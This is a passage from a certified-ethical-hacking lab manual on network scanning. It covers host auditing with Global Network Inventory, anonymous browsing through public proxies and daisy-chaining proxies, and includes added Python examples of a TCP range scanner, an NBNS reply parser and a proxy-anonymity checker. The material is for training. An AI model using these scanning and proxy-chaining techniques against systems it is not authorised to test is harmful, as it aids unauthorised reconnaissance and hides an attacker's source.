[Screenshot: New Audit Wizard, Authentication Settings: "Specify the authentication settings to use to connect to a remote computer." Options: Connect as currently logged on user; Connect as (selected) with the Domain \ User name and Password fields filled in. Buttons < Back, Next >, Cancel.]

Note: The program comes with dozens of customizable reports. New reports can be easily added through the user interface.
FIGURE 11.8 Global Network Inventory Authentication settings

10. Leave the settings at their defaults and click Finish to complete the wizard.

[Screenshot: New Audit Wizard, Completing the New Audit Wizard: "You are ready to start a new IP range scan. You can set the following options for this scan:" Do not record unavailable nodes (checked); Open scan progress dialog when scan starts (checked); Rescan nodes that have been successfully scanned; Rescan, but no more than once a day. "To complete this wizard, click Finish." Buttons < Back, Finish, Cancel.]

Note: Ability to generate reports on schedule after every scan, daily, weekly, or monthly.

Note: To configure reports choose Reports | Configure reports from the main menu and select a report from the tree control on the left. Each report can be configured independently.

FIGURE 11.9: Global Network Inventory final Audit wizard

11. The scanning progress is displayed in the Scan progress window.


[Screenshot: Scan progress window (08/22/12, 15:36). Rows recovered from the screenshot:

  #    Address     Name               Percent
  0    10.0.0.2    -                  -
  1    10.0.0.3    -                  -
  2    10.0.0.4    WIN-ULY858KHQIP    85%
  3    10.0.0.5    -                  -
  4    10.0.0.6    ADMINPC            92%
  5    10.0.0.7    WIN-D39MR5HL9E4    92%
  6-12 10.0.0.8 to 10.0.0.14          -

Options: Open this dialog when scan starts; Close this dialog when scan completes; Don't display completed scans. Elapsed time: 0 min 6 sec. Scanned nodes: 0/24. Buttons Stop, Close.]

Note: Filtering is a quick way to find a subset of data within a dataset. A filtered grid displays only the nodes that meet the criteria you specified for a column(s).
FIGURE 11.10: Global Network Inventory Scanning Progress
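The wizard's IP range scan works through the range one address at a time and, with Do not record unavailable nodes left on, keeps only the hosts that answered, which is what the Scan progress window above shows. The script below is an added example, not Global Network Inventory's own code nor Nessus's, that models that loop; the same TCP-connect check is what the Port Scanners and Port Scan Options sections of a Nessus policy configure for the scan in the previous lab. The range 10.0.0.2 to 10.0.0.25 matches the 24 nodes in the progress window; the ports probed (445 for SMB and 135 for the RPC endpoint mapper, which an agentless Windows audit relies on) and the one-second connect timeout are assumptions.

```python
"""Model of the New Audit Wizard's IP range scan: expand the range, probe each
address, and keep only the nodes that answered.

Added example; not part of Global Network Inventory or Nessus. The probed
ports, the lab range and the one-second timeout are assumptions for
illustration.
"""
import ipaddress
import socket
from concurrent.futures import ThreadPoolExecutor
from datetime import datetime

# Assumption: an agentless Windows audit needs SMB (445) and the RPC endpoint
# mapper (135), so a node that answers on either is worth auditing.
AUDIT_PORTS = (445, 135)


def expand_range(first, last):
    """Every IPv4 address from first to last inclusive, in scan order."""
    start = ipaddress.IPv4Address(first)
    end = ipaddress.IPv4Address(last)
    if end < start:
        raise ValueError("range end precedes range start")
    return [str(ipaddress.IPv4Address(n)) for n in range(int(start), int(end) + 1)]


def tcp_reachable(address, port, timeout=1.0):
    """Real TCP connect probe: True only if the three-way handshake completes."""
    try:
        with socket.create_connection((address, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable network, ...
        return False


def scan_range(first, last, probe=tcp_reachable, ports=AUDIT_PORTS,
               record_unavailable=False, workers=16):
    """Probe each address on each audit port, in parallel, in range order.

    record_unavailable=False mirrors the wizard default "Do not record
    unavailable nodes": addresses with no open audit port are dropped.
    The probe is injectable so the loop can be exercised without a network.
    """
    def check(address):
        open_ports = [p for p in ports if probe(address, p)]
        return {
            "address": address,
            "available": bool(open_ports),
            "open_ports": open_ports,
            "timestamp": datetime.now().strftime("%m/%d/%y %H:%M:%S"),
        }

    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(check, expand_range(first, last)))
    if not record_unavailable:
        results = [r for r in results if r["available"]]
    return results


if __name__ == "__main__":
    # Lab range, assumed from the 24 nodes shown in the Scan progress window.
    for node in scan_range("10.0.0.2", "10.0.0.25"):
        print(f'{node["address"]:<12} ports {node["open_ports"]} at {node["timestamp"]}')
```

Only hosts that complete a handshake are reported, so a firewall that silently drops the probe makes a live host look unavailable; that is the same blind spot the wizard's "unavailable nodes" option hides, and a reason to compare the result with a list of expected assets.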

12. After completion, the scanning results can be viewed as shown in the following figure.

[Screenshot: Global Network Inventory main window, Scan summary tab, grouped by domain WORKGROUP (COUNT=2): 10.0.0.4 (WIN-ULY858KHQIP, Microsoft Windows Server) and 10.0.0.7 (WIN-D39MR5HL9E4), each with Status "Success" and MAC address, vendor, OS name, processor and comment columns.]

Note: Global Network Inventory lets you change the grid layout simply by dragging column headers using the mouse. Dropping a header onto the Grouping pane groups data according to the values stored within the "grouped" column.
FIGURE 11.11: Global Network Inventory result window

13. Now select the Windows Server 2008 machine in the results view to view its individual results.


[Screenshot: Global Network Inventory, results for the single host 10.0.0.7 (WIN-D39MR5HL9E4), Status "Success", with the per-host result tabs (Computer system, Processors, Main board, Memory, Operating system, Services, NetBIOS, Shares, User groups, Users, Logged on, Network adapters, Hot fixes, Security center, Startup, Desktop, and others).]

Note: The Global Network Inventory grid color scheme is completely customizable. You can change Global Network Inventory colors by selecting Tools | Grid colors from the main menu and changing colors.
FIGURE 11.12 Global Network Inventory Individual machine results

14. The Scan Summary section gives you a brief summary of the machines that have been scanned.

To configure the results history level, choose Scan | Results history level from the main menu and set the desired history level.

FIGURE 11.13: Global Network Inventory Scan Summary tab

15. The Bios section gives details of the BIOS settings.


Scan only the items that you need by customizing the scan elements.

FIGURE 11.14: Global Network Inventory Bios summary tab

16. The Memory tab summarizes the memory in your scanned machine.

E-mail address - Specifies the e-mail address that people should use when sending e-mail to you at this account. The e-mail address must be in the format name@company, for example, someone@mycompany.com.

FIGURE 11.15: Global Network Inventory Memory tab

17. In the NetBIOS section, complete details can be viewed.


Message subject - Type the subject of your message. Global Network Inventory cannot post a message that does not contain a subject.

FIGURE 11.16: Global Network Inventory NetBIOS tab

18. The User Groups tab shows user account details within the workgroup.

Name - Specifies the friendly name associated with your e-mail address. When you send messages, this name appears in the From box of your outgoing messages.

FIGURE 11.17: Global Network Inventory User groups section

19. The Logged on tab shows the logged-on user details of the machine.


Port - Specifies the port number you connect to on your outgoing e-mail (SMTP) server. This port number is usually 25.

FIGURE 11.18: Global Network Inventory Logged on section

20. The Port connectors section shows the ports connected in the network.

Outgoing mail (SMTP) - Specifies your Simple Mail Transfer Protocol (SMTP) server for outgoing messages.

FIGURE 11.19: Global Network Inventory Port connectors tab

21. The Services section gives the details of the services installed on the machine.


To create a new custom report that includes more than one scan element, choose Reports | Configure reports from the main menu, click the Add button on the reports dialog, customize the settings as desired, and click the OK button.

FIGURE 11.20: Global Network Inventory Services section

22. The Network Adapters section shows the Adapter IP and Adapter type.

A security account password is created to make sure that no other user can log on to Global Network Inventory. By default, Global Network Inventory uses a blank password.

FIGURE 11.21: Global Network Inventory Network Adapter tab

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.


Tool/Utility: Global Network Inventory

Information Collected/Objectives Achieved:

IP Scan Range: 10.0.0.1 - 10.0.0.50

Scanned IP Address: 10.0.0.7, 10.0.0.4

Result:
■ Scan summary
■ Bios
■ Memory
■ NetBIOS
■ User Group
■ Logged On
■ Port connector
■ Services
■ Network Adapter

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Can Global Network Inventory audit remote computers and network appliances, and if yes, how?

2. How can you export the Global Network agent to a shared network directory?

Internet Connection Required

□ Yes ☑ No

Platform Supported

☑ Classroom ☑ iLabs


Anonymous Browsing using Proxy Switcher

Proxy Switcher allows you to automatically execute actions based on the detected network connection.

Lab Scenario

In the previous lab, you gathered information such as the scan summary, NetBIOS details, services running on a computer, etc. using Global Network Inventory.

NetBIOS provides programs with a uniform set of commands for requesting the lower-level services that the programs must have to manage names, conduct sessions, and send datagrams between nodes on a network. A vulnerability has been identified in Microsoft Windows that involves one of the NetBIOS over TCP/IP (NetBT) services, the NetBIOS Name Server (NBNS). With this service, an attacker can find a computer's IP address by using its NetBIOS name, and vice versa. The response to a NetBT name service query may contain random data from the destination computer's memory; an attacker could seek to exploit this vulnerability by sending the destination computer a NetBT name service query and then looking carefully at the response to determine whether any random data from that computer's memory is included.

As an expert penetration tester, you should follow typical security practices; to block such Internet-based attacks, block port 137 User Datagram Protocol (UDP) at the firewall. You must also understand how networks are scanned using Proxy Switcher.
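The NetBT name-service exchange described above, as an added example that is not part of the lab manual: a small NBNS (RFC 1002) parser that walks every record of a UDP/137 datagram and reports any bytes left after the last declared record, which is the check a monitoring rule would apply to captured replies. The host name LABHOST, the transaction ID, and the address in the sample reply are constructed values.

```python
from __future__ import annotations
import socket
import struct

# RR types from RFC 1002; the sample name/transaction id below are constructed.
NB_NAME_QUERY = 0x0020      # NetBIOS general name service RR
NB_STATUS_QUERY = 0x0021    # node status (NBSTAT) RR


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001 section 14.1): pad to 15 characters, append the
    suffix byte, then map each nibble to a letter 'A'..'P'. Yields a 32-byte label."""
    raw = name.upper().encode("ascii")[:15].ljust(15, b" ") + bytes([suffix])
    return bytes(b for c in raw for b in (0x41 + (c >> 4), 0x41 + (c & 0x0F)))


def decode_netbios_name(label: bytes) -> tuple[str, int]:
    """Reverse of encode_netbios_name: returns (name without padding, suffix)."""
    if len(label) != 32 or any(c < 0x41 or c > 0x50 for c in label):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((label[i] - 0x41) << 4) | (label[i + 1] - 0x41) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def _parse_name(buf: bytes, off: int) -> tuple[bytes, int]:
    """Return the first label of the name at `off` and the offset just past the name.
    Handles the DNS-style compression pointer (top two bits set) some responders use."""
    length = buf[off]
    if length & 0xC0 == 0xC0:
        ptr = ((length & 0x3F) << 8) | buf[off + 1]
        label, _ = _parse_name(buf, ptr)
        return label, off + 2
    label = buf[off + 1:off + 1 + length]
    off += 1 + length
    while buf[off] != 0:            # skip any NetBIOS scope-id labels
        off += 1 + buf[off]
    return label, off + 1


def parse_nbns(packet: bytes) -> dict:
    """Walk every section of an NBNS datagram. The returned 'trailing' field holds
    whatever bytes sit after the last declared record; a well-formed reply has none."""
    if len(packet) < 12:
        raise ValueError("short NBNS header")
    trn_id, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", packet[:12])
    off, questions, records = 12, [], []
    for _ in range(qd):
        label, off = _parse_name(packet, off)
        qtype, qclass = struct.unpack("!HH", packet[off:off + 4])
        off += 4
        questions.append((decode_netbios_name(label), qtype, qclass))
    for _ in range(an + ns + ar):
        label, off = _parse_name(packet, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", packet[off:off + 10])
        off += 10
        rdata = packet[off:off + rdlen]
        if len(rdata) != rdlen:
            raise ValueError("record data truncated")
        off += rdlen
        records.append((decode_netbios_name(label), rtype, rclass, ttl, rdata))
    return {
        "trn_id": trn_id,
        "is_response": bool(flags & 0x8000),
        "rcode": flags & 0x000F,
        "questions": questions,
        "records": records,
        "trailing": packet[off:],
    }


def build_name_query_response(trn_id: int, name: str, ip: str, extra: bytes = b"") -> bytes:
    """Construct a positive NB name-query response (flags 0x8580: response, authoritative,
    recursion desired/available) as test input. `extra` appends bytes beyond the
    declared record so the trailing-data check has something to find."""
    header = struct.pack("!HHHHHH", trn_id, 0x8580, 0, 1, 0, 0)
    rr_name = b"\x20" + encode_netbios_name(name) + b"\x00"
    rdata = struct.pack("!H", 0x0000) + socket.inet_aton(ip)   # NB_FLAGS (unique, B-node) + address
    rr = rr_name + struct.pack("!HHIH", NB_NAME_QUERY, 0x0001, 300000, len(rdata)) + rdata
    return header + rr + extra


def response_is_clean(packet: bytes) -> bool:
    """True when the datagram ends exactly where its last declared record ends."""
    return parse_nbns(packet)["trailing"] == b""


if __name__ == "__main__":
    good = build_name_query_response(0x1234, "LABHOST", "10.0.0.7")
    bad = build_name_query_response(0x1234, "LABHOST", "10.0.0.7", extra=b"\xde\xad\xbe\xef")
    for pkt in (good, bad):
        parsed = parse_nbns(pkt)
        verdict = "clean" if response_is_clean(pkt) else f"{len(parsed['trailing'])} trailing byte(s)"
        print(parsed["records"][0][0], verdict)
```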

Lab Objectives

This lab will show you how networks can be scanned and how to use Proxy Switcher. It will teach you how to:

■ Hide your IP address from the websites you visit

■ Switch proxy servers for improved anonymous surfing


Lab Environment

To carry out the lab, you need:

■ Proxy Switcher is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher

■ You can also download the latest version of Proxy Workbench from this link: http://www.proxyswitcher.com/

■ If you decide to download the latest version, then the screenshots shown in the lab might differ

■ A computer running Windows Server 2012

■ A web browser with Internet access

■ Follow the wizard-driven installation steps to install Proxy Switcher

■ Administrative privileges to run tools

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration

Time: 15 Minutes

Overview of Proxy Switcher

Proxy Switcher allows you to automatically execute actions based on the detected network connection. As the name indicates, Proxy Switcher comes with some default actions, for example, setting proxy settings for Internet Explorer, Firefox, and Opera.

Lab Tasks

Automatic change of proxy configurations (or any other action) based on network information.

1. Install Proxy Workbench in Windows Server 2012 (Host Machine)

2. Proxy Switcher is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Switcher

3. Follow the wizard-driven installation steps and install it on all platforms of the Windows operating system.

4. This lab will work in the CEH lab environment - on Windows Server 2012, Windows Server 2008, and Windows 7

5. Open the Firefox browser in your Windows Server 2012, go to Tools, and click Options in the menu bar.


Often different Internet connections require completely different proxy server settings, and it's a real pain to change them manually.

FIGURE 12.1: Firefox options tab

6. Go to the Advanced profile in the Options wizard of Firefox, select the Network tab, and then click Settings.


Proxy Switcher is fully compatible with Internet Explorer, Firefox, Opera, and other programs.

FIGURE 12.2: Firefox Network Settings

7. Select the Use system proxy settings radio button, and click OK.


Proxy Switcher supports the following command line option: -d: Activate direct connection.

FIGURE 12.3: Firefox Connection Settings

8. Now, to install Proxy Switcher Standard, follow the wizard-driven installation steps.

9. To launch Proxy Switcher Standard, go to the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

TASK 1: Proxy Servers Downloading

FIGURE 12.4: Windows Server 2012 - Desktop view

10. Click the Proxy Switcher Standard app to open the Proxy Switcher window.

OR

Click Proxy Switcher from the Tray Icon list.


Proxy Switcher is free to use without limitations for personal and commercial use.

FIGURE 12.5: Windows Server 2012 - Apps

If the server becomes inaccessible, Proxy Switcher will try to find a working proxy server; a reddish background will be displayed till a working proxy server is found.

FIGURE 12.6: Select Proxy Switcher

11. The Proxy List Wizard will appear as shown in the following figure; click Next.


Proxy Switcher supports LAN, dialup, VPN, and other RAS connections.

The wizard opens with "Welcome to the Proxy Switcher. Using this wizard you can quickly complete common proxy list management tasks. To continue, click Next."

FIGURE 12.7: Proxy List wizard

12. Select the Find New Servers, Rescan Servers, Recheck Dead radio button from Common Tasks, and click Finish.

Proxy switching from the command line (can be used at logon to automatically set connection settings).

The Common Tasks page offers: Find New Servers, Rescan Servers, Recheck Dead; Find 100 New Proxy Servers; Find New Proxy Servers Located in a Specific Country; Rescan Working and Anonymous Proxy Servers.

FIGURE 12.8: Select common tasks

13. A list of downloaded proxy servers will show in the left panel.


When Proxy Switcher is running in Keep Alive mode, it tries to maintain a working proxy server connection by switching to a different proxy server if the current one dies.

FIGURE 12.9: List of downloaded Proxy Servers

14. To stop downloading the proxy servers, click the button shown in the following figure.

When the active proxy server becomes inaccessible, Proxy Switcher will pick a different server from the Proxy Switcher category. If the active proxy server is currently alive, the background will be green.

FIGURE 12.10: Click on Start button

15. Click Basic Anonymity in the right panel; it shows a list of downloaded proxy servers.


When running in Auto Switch mode, Proxy Switcher will switch active proxy servers regularly. The switching period can be set with a slider from 5 minutes to 10 seconds.

FIGURE 12.11: Selecting downloaded Proxy server from Basic Anonymity

16. Select one proxy server IP address from the right panel to switch to the selected proxy server, and click the icon.

In addition to the standard add/remove/edit functions, the proxy manager contains functions useful for anonymous surfing and proxy availability testing.

FIGURE 12.12: Selecting the proxy server

17. The selected proxy server connects, and Proxy Switcher shows the connection icon and the active proxy in its title bar, as in the following figure.

CEH Lab Manual Page 207 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks

[Figure: Proxy Switcher title bar reads "Proxy Switcher Unregistered (Active Proxy: 95.110.159.54:8080 - ITALY)". In the Basic Anonymity list the entry 95.110.159.54:8080 (Alive-SSL) ITALY is selected. Status bar: Disabled, Keep Alive, Auto Switch.]

FIGURE 12.13: Successful connection of selected proxy

Starting from version 3.0, Proxy Switcher incorporates an internal proxy server. It is useful when you want to use other applications (besides Internet Explorer) that support an HTTP proxy via Proxy Switcher. By default it waits for connections on localhost:3128.

18. Go to a web browser (Firefox), and type the following URL, http://www.proxyswitcher.com/check.php, to check the selected proxy server's connectivity; if it is successfully connected, the page reports the proxy it detected, as in the following figure. Two things are worth noting when reading the result. First, the proxy address the page sees (95.110.159.67) can differ from the address you connected to (95.110.159.54), because a proxy may send its outbound traffic from another interface or through a further proxy. Second, the page still lists addresses other than the proxy's under "Your possible IP address"; it can only do that if those addresses reached it, typically in request headers such as X-Forwarded-For or Via that a forwarding proxy adds. A proxy that behaves this way is detectable as a proxy and does not hide the original client.

[Figure: Firefox showing the Proxy Switcher check page. Your possible IP address is: 202.53.11.130, 192.168.1.1. Location: Unknown. Proxy Information: Proxy Server: DETECTED; Proxy IP: 95.110.159.67; Proxy Country: Unknown.]

FIGURE 12.14: Detected proxy server

19. Open another tab in the web browser, and surf anonymously using this proxy.


After the anonymous proxy servers have become available for switching, you can activate any one of them to become invisible to the sites you visit.

[Figure: Firefox tab showing a Google search for "proxy server". Because the traffic leaves through the Italian proxy, Google serves the Italian site (www.google.it, "Cerca con Google") and Italian-language results such as the it.wikipedia.org article on proxies, publicproxyservers.com and proxyserver.com.]

FIGURE 12.15: Surf using proxy server
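The check in Step 18 works because the web server on the far side can compare the address that actually connected to it with any addresses carried in the request headers. The following is an added example, not part of this lab manual or of Proxy Switcher: the server-side logic such a check page needs, run over constructed sample headers. The header names, the category labels, the sample values (the lab's 202.53.11.130, 192.168.1.1 and 95.110.159.67 are reused) and the loose mapping onto Proxy Switcher's buckets are assumptions; "High Anonymous" is the only label taken from the tool. It goes a little beyond the lab's single check by also classifying a direct connection and a proxy that leaks the client through headers other than X-Forwarded-For.

```python
"""Added example, not part of this lab manual or of Proxy Switcher: the server-side logic
behind a proxy check page. Given the TCP peer, the client's real address and the request
headers, classify what the proxy reveals. Header list, labels and samples are assumptions."""
import ipaddress
import re

# Request headers in which a forwarding proxy may carry the original client address.
LEAK_HEADERS = ("x-forwarded-for", "forwarded", "x-real-ip", "client-ip",
                "x-client-ip", "true-client-ip", "x-originating-ip")
# Headers whose mere presence shows that some proxy handled the request.
PROXY_MARKERS = LEAK_HEADERS + ("via", "proxy-connection", "x-proxy-id")

_IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def addresses_in(value):
    """Return the distinct, valid IPv4 addresses mentioned in a header value, in order."""
    found = []
    for token in _IPV4.findall(value or ""):
        try:
            ipaddress.IPv4Address(token)
        except ipaddress.AddressValueError:
            continue  # e.g. 999.1.1.1 matches the pattern but is not an address
        if token not in found:
            found.append(token)
    return found


def possible_client_ips(headers):
    """Addresses a check page would print as "your possible IP address": everything that
    a proxy forwarded in a leak header (the lab's page showed 202.53.11.130, 192.168.1.1)."""
    lowered = {k.lower(): v for k, v in headers.items()}
    found = []
    for name in LEAK_HEADERS:
        for ip in addresses_in(lowered.get(name)):
            if ip not in found:
                found.append(ip)
    return found


def classify_proxy(peer_ip, client_ip, headers):
    """Classify from the web server's point of view.
      direct         - the peer is the client itself; no proxy in the path
      transparent    - a proxy is in the path and forwards the real client address
      anonymous      - the client address is hidden, but headers reveal a proxy
      high_anonymous - indistinguishable from a direct client
    Proxy Switcher's own bucket names are only loosely comparable (assumption)."""
    if peer_ip == client_ip:
        return "direct"
    if client_ip in possible_client_ips(headers):
        return "transparent"
    if {k.lower() for k in headers} & set(PROXY_MARKERS):
        return "anonymous"
    return "high_anonymous"


# Constructed samples: real client 202.53.11.130 behind a LAN router (192.168.1.1), reaching
# the check page through a proxy whose egress address is 95.110.159.67, as in the lab figure.
REAL_CLIENT = "202.53.11.130"
SAMPLES = {
    "leaky": ("95.110.159.67", {"Via": "1.1 proxy",
                                "X-Forwarded-For": "192.168.1.1, 202.53.11.130"}),
    "masked": ("95.110.159.67", {"Via": "1.1 proxy"}),
    "silent": ("95.110.159.67", {}),
    "none": (REAL_CLIENT, {}),
}


def report():
    """Verdict per sample; run this to see which proxies actually hide the client."""
    return {name: classify_proxy(peer, REAL_CLIENT, hdrs)
            for name, (peer, hdrs) in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in report().items():
        print(f"{name:>7}: {verdict}")
```

Only the "silent" sample would satisfy a user who wants to be invisible to the sites visited; the "leaky" sample is exactly the situation in which a check page can print the client's own addresses next to the detected proxy.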

Lab Analysis

Document all the IP addresses of live (SSL) proxy servers and the connectivity you discovered during the lab.

Tool/Utility: Proxy Switcher

Information Collected/Objectives Achieved:

■ Server: list of available proxy servers
■ Selected proxy server IP address: 95.110.159.54
■ Selected proxy country name: ITALY
■ Resulting proxy server IP address (as reported by the check page): 95.110.159.67

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Examine which technologies are used for Proxy Switcher.

2. Evaluate why Proxy Switcher is not open source.


Internet Connection Required

☑ Yes ☐ No

Platform Supported

☑ Classroom ☐ iLabs


Lab 13

Daisy Chaining using Proxy Workbench

Proxy Workbench is a unique proxy server, ideal for developers, security experts, and trainers, which displays data in real time.

ICON KEY: Valuable information; Test your knowledge; Web exercise; Workbook review

Lab Scenario

You have learned in the previous lab how to hide your actual IP address using Proxy Switcher and browse anonymously. Similarly, an attacker with malicious intent can pose as someone else using a proxy server and gather information such as the account or bank details of an individual by performing social engineering. Once the attacker gains relevant information, he or she can break into that individual's bank account and use it for online shopping. Attackers sometimes use multiple proxy servers for scanning and attacking, making it very difficult for administrators to trace the real source of attacks.

As an administrator, you should be able to detect such attacks by deploying an intrusion detection system, with which you can collect network information for analysis to determine if an attack or intrusion has occurred. You can also use Proxy Workbench to understand how networks are scanned.

Lab Objectives

This lab will show you how networks can be scanned and how to use Proxy Workbench. It will teach you how to:

■ Use the Proxy Workbench tool
■ Daisy chain the Windows host machine and the virtual machines

Lab Environment

To carry out the lab, you need:

■ Proxy Workbench, located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench


■ You can also download the latest version of Proxy Workbench from this link: http://proxyworkbench.com
■ If you decide to download the latest version, then the screenshots shown in the lab might differ
■ A computer running Windows Server 2012 as attacker (host machine)
■ Other computers running Windows Server 2008 and Windows 7 as victims (virtual machines)
■ A web browser with Internet access
■ Follow the wizard-driven installation steps to install Proxy Workbench
■ Administrative privileges to run tools

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration

Time: 20 Minutes

Overview of Proxy Workbench

Proxy Workbench is a proxy server that displays its data in real time. It shows the data flowing between the web browser and the web server, and it even analyzes FTP in passive and active modes.

Lab Tasks

Security: proxy servers provide a level of security within a network. They can help prevent security attacks when the only way into the network from the Internet is via the proxy server.

1. Install Proxy Workbench on all platforms of the Windows operating system (Windows Server 2012, Windows Server 2008, and Windows 7).

2. Proxy Workbench is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Proxy Tools\Proxy Workbench.

3. You can also download the latest version of Proxy Workbench from this link: http://proxyworkbench.com

4. Follow the wizard-driven installation steps and install it on all platforms of the Windows operating system.

5. This lab will work in the CEH lab environment, on Windows Server 2012, Windows Server 2008, and Windows 7.

6. Open the Firefox browser in your Windows Server 2012, go to Tools, and click Options.


[Figure: Firefox on Windows Server 2012 showing Google, with the Tools menu open (Downloads, Add-ons, Set Up Sync, Web Developer, Page Info, Clear Recent History, Options).]

FIGURE 13.1: Firefox Options tab

7. Go to the Advanced panel of the Firefox Options window, select the Network tab, and then click Settings.
The sockets panel shows the number of alive socket connections that Proxy Workbench is managing. During periods of no activity this will drop back to zero.

[Figure: Firefox Options window, Advanced panel, Network tab. Connection: "Configure how Firefox connects to the Internet" with a Settings... button; the Cached Web Content and Offline Web Content and User Data sections follow.]

FIGURE 13.2: Firefox Network Settings


8. Check Manual proxy configuration in the Connection Settings window.

9. Type 127.0.0.1 as the HTTP Proxy, enter the port value as 8080, check the option Use this proxy server for all protocols, and click OK.

The status bar shows the details of Proxy Workbench's activity. The first panel displays the amount of data Proxy Workbench currently has in memory. The actual amount of memory that Proxy Workbench is consuming is generally much more than this, due to the overhead of managing it.

[Figure: Firefox Connection Settings with Manual proxy configuration selected. HTTP Proxy 127.0.0.1, Port 8080; "Use this proxy server for all protocols" checked, so the SSL Proxy, FTP Proxy and SOCKS Host are also 127.0.0.1:8080 (SOCKS v5); No Proxy for: localhost, 127.0.0.1.]

FIGURE 13.3: Firefox Connection Settings

10. While configuring, if you encounter any port error, please ignore it.

11. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

Scan computers by IP range, by domain, single computers, or computers defined by the Global Network Inventory host file.

[Figure: Windows Server 2012 desktop with the Start tile shown in the lower-left corner.]

FIGURE 13.4: Windows Server 2012 - Desktop view

12. Click the Proxy Workbench app to open the Proxy Workbench window.


The events panel displays the total number of events that Proxy Workbench has in memory. By clearing the data (File -> Clear All Data) this will decrease to zero if there are no connections that are alive.

[Figure: Windows Server 2012 Apps screen with tiles for Server Manager, Windows PowerShell, Google Chrome, Hyper-V Manager, Control Panel, Hyper-V Virtual Machine Connection, SQL Server, Command Prompt, Firefox, Global Network Inventory and Proxy Workbench.]

FIGURE 13.5: Windows Server 2012 - Apps

13. The Proxy Workbench main window appears as shown in the following figure.

The last panel displays the current time as reported by your operating system.

[Figure: Proxy Workbench main window. Left: Monitoring: WIN-D33MR5HL9E4 (10.0.0.7), with a connection tree of SMTP - Outgoing e-mail (25), POP3 - Incoming e-mail (110), HTTP Proxy - Web (8080), HTTPS Proxy - Secure Web (443), FTP - File Transfer Protocol (21) and Pass Through - For Testing Apps (1000). Right: Details for All Activity with From, To, Protocol and Started columns, e.g. 127.0.0.1:51199 to 173.194.36.24:80 (www.g...) HTTP 18:23:39. Bottom: real-time data for All Activity, a hex and ASCII dump of a request carrying User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1, Proxy-Connection: keep-alive and Host: mail.google.com. Status bar: Memory: 95 KByte, Sockets: 100, Events: 754.]

FIGURE 13.6: Proxy Workbench main window

14. Go to Tools on the toolbar, and select Configure Ports.


The "Show the real time data window" option allows the user to specify whether the real-time data pane should be displayed or not.

[Figure: Proxy Workbench main window with the Tools menu open: Save Data..., Configure Ports..., Failure Simulation..., Real Time Logging..., Options...]

FIGURE 13.7: Proxy Workbench Configure Ports option

15. In the Configure Proxy Workbench window, select 8080 HTTP Proxy - Web in the left pane, Ports to listen on.

16. Check HTTP in the right pane, Protocol assigned to port 8080, and click Configure HTTP for port 8080.

People who benefit from Proxy Workbench:

■ Home users who have taken the first step in understanding the Internet and are starting to ask "But how does it work?"
■ People who are curious about how their web browser, email client or FTP client communicates with the Internet.
■ People who are concerned about malicious programs sending sensitive information out into the Internet. The information that programs are sending can be readily identified.
■ Internet software developers who are writing programs to existing protocols. Software development for the Internet is often very complex, especially when a program is not properly adhering to a protocol. Proxy Workbench allows developers to instantly identify protocol problems.
■ Internet software developers who are creating new protocols and developing the client and server software simultaneously. Proxy Workbench will help identify non-compliant protocol ...
■ Internet security experts will benefit from seeing the data flowing in real time. This will help them see who is doing what and when.

[Figure: Configure Proxy Workbench window. Ports to listen on: 25 SMTP - Outgoing e-mail; 110 POP3 - Incoming e-mail; 8080 HTTP Proxy - Web (selected); 443 HTTPS Proxy - Secure Web; 21 FTP - File Transfer Protocol; 1000 Pass Through - For Testing Apps. Protocol assigned to port 8080: HTTP checked, with <Don't use>, Pass Through, HTTPS, POP3 and FTP as the alternatives. Buttons: Add, Delete, Configure HTTP for port 8080; "Show this screen at startup" checked; Close.]

FIGURE 13.8: Proxy Workbench configuring HTTP for port 8080

17. The HTTP Properties window appears. Check Connect via another proxy, enter your Windows Server 2008 virtual machine IP address in Proxy server, enter 8080 in Port, and then click OK.

Many people understand sockets much better than they think. When you surf the web and go to a website called www.altavista.com, you are actually directing your web browser to open a socket connection to the server called "www.altavista.com" with port number 80.

[Figure: HTTP Properties window, General tab. "On the web server, connect to port:" is not selected; "Connect via another proxy" is selected, with Proxy server set to the upstream machine's address (10.0.0.7 in the captured screenshot) and Port 8080.]

FIGURE 13.9: Proxy Workbench HTTP for port 8080

18. Click Close in the Configure Proxy Workbench window after completing the configuration settings.

The real-time logging allows you to record everything Proxy Workbench does to a text file. This allows the information to be readily imported into a spreadsheet or database so that the most advanced analysis can be performed on the data.

[Figure: Configure Proxy Workbench window after configuration: the same port list (25, 110, 8080, 443, 21, 1000), with HTTP assigned to port 8080 and the Configure HTTP for port 8080 button.]

FIGURE 13.10: Proxy Workbench configured proxy

19. Repeat the Proxy Workbench configuration steps, from Step 11 to Step 18, in the Windows Server 2008 virtual machine.


20. In Windows Server 2008, type the IP address of the Windows 7 virtual machine as the proxy server in the HTTP Properties window.

21. Open the Firefox browser that you configured to use the proxy in Steps 6 to 9 (on Windows Server 2012) and browse web pages.

22. Proxy Workbench generates the traffic, which is shown on Windows Server 2012 as in the following figure.

